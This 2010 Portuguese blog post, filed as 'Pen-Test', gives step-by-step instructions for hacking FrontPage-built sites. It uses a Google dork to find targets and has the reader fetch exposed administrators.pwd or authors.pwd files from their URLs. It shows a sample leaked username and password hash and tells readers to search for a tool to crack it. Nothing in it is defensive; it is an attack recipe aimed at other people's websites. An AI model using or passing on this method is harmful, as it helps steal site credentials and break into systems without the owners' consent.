Explorando Sites Feitos no Microsoft Frontpage

agosto 13, 2010   Samukt   4 Comments

primeiro abra o Google,

digite: inurl:_vti_pvt

isso localiza sites feitos em frontpage, pois o frontpage cria essas pastas.

Explorando a vulnerabilidade.

clique em um site da pesquisa feita por: inurl:_vti_pvt
e adicione ao final da url:

administrators.pwd OU authors.pwd

exemplo:
http://www.site/_vti_pvt/administrators.pwd

se der para explorar a vulnerabilidade aparecerá o usuário seguido da senha
ex:

# -FrontPage-
21stcapital:RzSXiKATauHFI

A senha virá criptografada, procure um decripter no google

Creditos: # SiD Nomore (No+)

Posted in: Pen-Test   Tags: , , , ,

Deixe uma resposta

O seu endereço de email não será publicado Campos obrigatórios são marcados *

*

Você pode usar estas tags e atributos de HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

  • Publicidade